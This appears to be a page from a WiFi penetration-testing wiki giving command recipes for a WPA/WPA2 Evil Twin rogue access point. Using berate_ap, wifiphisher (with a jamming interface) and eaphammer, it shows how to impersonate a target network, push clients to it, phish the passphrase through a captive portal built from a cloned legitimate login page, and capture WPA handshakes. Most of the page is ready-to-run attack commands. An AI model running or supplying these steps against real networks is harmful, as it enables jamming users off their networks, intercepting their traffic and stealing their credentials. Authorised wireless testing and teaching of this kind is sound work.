-
Notifications
You must be signed in to change notification settings - Fork 183
12. WPA WPA2 Personal (PSK) Rogue AP Evil Twin
Koutto edited this page Nov 1, 2020
·
1 revision
- Performing Evil Twin Attack with an AP set up with WPA/WPA2 will require the knowledge of the passphrase of the target network (e.g. in conference, passphrase already cracked...).
- If passphrase is unknown, an Evil Twin attack using an Open Network rogue AP can be set up (for example to attempt retrieving passphrase by phishing via captive portal attack).
- With Internet sharing (default):
berate_ap <interface_AP> <interface_internet> <SSID> <passphrase>
- Without internet sharing
berate_ap -n <interface_AP> <SSID> <passphrase>
- Bridged internet sharing (pre-configured bridge interface)
berate_ap -m bridge <interface_AP> <interface_internet> <SSID> <passphrase>
- Internet sharing from the same WiFi interface
berate_ap <interface_AP> <interface_AP> <SSID> <passphrase>
- Enable IEEE 802.11n (with 40MHz)
berate_ap --ieee80211n --ht_capab '[HT40+]' <interface_AP> <interface_internet> <SSID> <passphrase>
- Enable client isolation
berate_ap --isolate-clients <interface_AP> <interface_internet> <SSID> <passphrase>
wifiphisher -aI <interface_rogue_AP> -jI <interface_jamming> --essid <target_SSID> -pK <passphrase> -kN
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase <passphrase> --captive-portal # WPA2 by default
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase <passphrase> --captive-portal --wpa-version 1 # Force WPA1
For best results on phishing:
- Clone legitimate page (wget),
- Copy cloned web page in /var/www/html/ directory(eaphammer serves webpage from here according to default Apache2 configuration).
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-psk \
--essid <SSID> --wpa-passphrase randompassphrase --capture-wpa-handhshake
- 01. WiFi Basics
- 02. 802.11 Specifications
- 03. WPS (WiFi Protected Setup)
- 04. WPA Protocol Overview
- 05. WPA/WPA2 Personal (PSK) Authentication
- 06. WPA/WPA2 PSK Traffic Decryption
- 07. WPA/WPA2 Enterprise (MGT)
- 08. Evil Twin Attacks
- 09. 802.11 Network Selection Algorithms
- 01. WiFi Interfaces Management
- 02. WiFi Connection
- 03. WiFi Monitoring (Passive Scanning)
- 04. Hotspot Captive Portal Bypass
- 05. WiFi Denial of Service
- 06. WEP Authentication Cracking
- 07. WPA/WPA2 Personal (PSK) Authentication Cracking
- 08. WPA/WPA2 Enterprise (MGT) Authentication Cracking
- 09. WPA/WPA2 Personal (PSK) Traffic Decryption
- 10. Basic AP (Manual Configuration)
- 11. Open Network (no passphrase) Rogue AP / Evil Twin
- 12. WPA/WPA2 Personal (PSK) Rogue AP / Evil Twin
- 13. WPA/WPA2 Enterprise (MGT) Rogue AP / Evil Twin